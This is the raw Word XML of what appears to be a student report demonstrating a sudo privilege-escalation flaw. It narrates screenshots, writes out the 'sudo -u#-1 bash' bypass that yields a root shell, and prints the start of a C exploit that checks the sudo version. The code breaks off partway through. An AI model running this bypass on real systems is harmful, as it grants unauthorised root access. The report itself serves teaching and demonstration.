    <w:p w14:paraId="176A5EC4" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="5B02937C" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1403F82C" wp14:editId="77547DD5">
            <wp:extent cx="5730240" cy="1539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539240"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE0D331" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="2812BBCB" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="71BB2F0A" w14:textId="66C24E42" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:t>So I listed all files in home directory,</w:t>
      </w:r>
      <w:r w:rsidRPr="00A072FF">
        <w:t xml:space="preserve"> you can see that we have a </w:t>
      </w:r>
      <w:r w:rsidRPr="00A072FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>test.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00A072FF">
        <w:t xml:space="preserve"> file if I </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A072FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:r w:rsidRPr="00A072FF">
        <w:t xml:space="preserve">  the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A072FF">
        <w:t xml:space="preserve"> desktop output takes their user interface by default then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474117A3" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="350879BC" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F6C4A03" wp14:editId="78605C2F">
            <wp:extent cx="5730240" cy="19507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2132F8BE" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="3B7D4387" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="4F9455DA" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="08AE74CD" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="27C37F77" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="11FDCB67" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="5070F9B8" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="1928F6BE" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="538E83E8" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="1D672D8E" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="1A4B6500" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="596E5E41" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="7A22D8B9" w14:textId="58ADD759" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r w:rsidRPr="00A072FF">
        <w:t xml:space="preserve">you can see that we were able to use VI with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A072FF">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A072FF">
        <w:t xml:space="preserve"> or root permissions successfully and that we can write a file to the root home directory then you can clearly see the power that this exploit has now let's take a look at the last scenario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202B6818" w14:textId="77777777" w:rsidR="00726945" w:rsidRDefault="00726945" w:rsidP="00647322"/>
    <w:p w14:paraId="25E12DBD" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="23BD6419" wp14:editId="33B5D1A6">
            <wp:extent cx="5730240" cy="29489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4AA4814E" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="2401586B" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="62A9B47F" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="237E4BBF" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="3F2CAF89" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="3056E9BF" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="11520919" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="1333CD37" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="4554753F" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="5422C98D" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="559B13FE" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="395AD516" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="6CAD705A" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="54BC11D9" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="4E059410" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="470E08AC" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="006F86AE" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="518E6CAB" w14:textId="3C4536BD" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This is pretty much what many s</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">stem administrators offer to users who need at least some versatility with the commands in general or with respect to the commands. Users they should run like </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> so I saved.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A072FF">
        <w:t xml:space="preserve"> And this could tell us </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A072FF">
        <w:t>we've</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A072FF">
        <w:t xml:space="preserve"> got an unused command alias that's just fine</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4651B837" w14:textId="77777777" w:rsidR="00726945" w:rsidRDefault="00726945" w:rsidP="00647322"/>
    <w:p w14:paraId="5FEBC372" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61389A7B" wp14:editId="538B3DF8">
            <wp:extent cx="5722620" cy="4069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72B5E439" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="4701498E" w14:textId="481501BA" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r w:rsidRPr="007D2364">
        <w:t xml:space="preserve">So I'm going to go back to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>upekshitha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D2364">
        <w:t xml:space="preserve"> here and this time let's try to get a bash shell so sort this out and if I say </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D2364">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D2364">
        <w:t xml:space="preserve"> bash I'm going to go in there you're going to tell us that this user isn't allowed to run.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F01E0D" w14:textId="77777777" w:rsidR="00726945" w:rsidRDefault="00726945" w:rsidP="00647322"/>
    <w:p w14:paraId="176FA754" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FD53268" wp14:editId="50FB750E">
            <wp:extent cx="5730240" cy="12268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3172F3B8" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="21FCA825" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="74CB6629" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="3A1B211D" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="3DD236DE" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="448FBA9D" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="58F6FC50" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="163A7CC1" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="13B4B78A" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r w:rsidRPr="007D2364">
        <w:t xml:space="preserve">If I tell you in our </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D2364">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D2364">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -u#-1 bash</w:t>
      </w:r>
      <w:r w:rsidRPr="007D2364">
        <w:t xml:space="preserve"> and I hit enter, and you can see I got root access here</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F1EFA5" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="5A833D7E" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03CDB208" wp14:editId="05338F43">
            <wp:extent cx="5730240" cy="20040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004060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="77DAFF95" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="1B19BA01" w14:textId="249DCADF" w:rsidR="002D2B91" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>And actually, I</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> got the </w:t>
      </w:r>
      <w:r w:rsidRPr="007D2364">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>c code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exploitation file from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> So I will put the reference as well end of this report. So that, is similar as which I did with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>therminal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> codes above</w:t>
      </w:r>
      <w:r w:rsidR="002D2B91">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A1DDEF" w14:textId="77777777" w:rsidR="00647322" w:rsidRDefault="00647322" w:rsidP="00647322"/>
    <w:p w14:paraId="1CCBE368" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="007876DE" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54DFCE7E" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stdbool.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29019D14" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF3D1EC" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC9136A" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>string.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35FAAAB1" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>#define VERSION_PATCH "1828"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C731254" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15930C0A" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>check_sudo_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4541A849" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    char </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>buffer[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4096];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E1CB65" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    char buffer2[4096</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2B44911F" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    char buffer3[4096</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="00802B48" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FILE *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>popen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>V","r</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50092B8B"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fgets</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(buffer,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>4096,sudo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_version);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD84ACB" w14:textId="77777777" w:rsidR="00647322" w:rsidRPr="00726945" w:rsidRDefault="00647322" w:rsidP="00647322">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    char *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>split_buffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>strtok</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>buffer,"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> version");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B9FDC7"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sprintf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(buffer2,"%s</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>",split</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00726945">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_buffer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48497F54"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printf</w:t>
      </w:r>
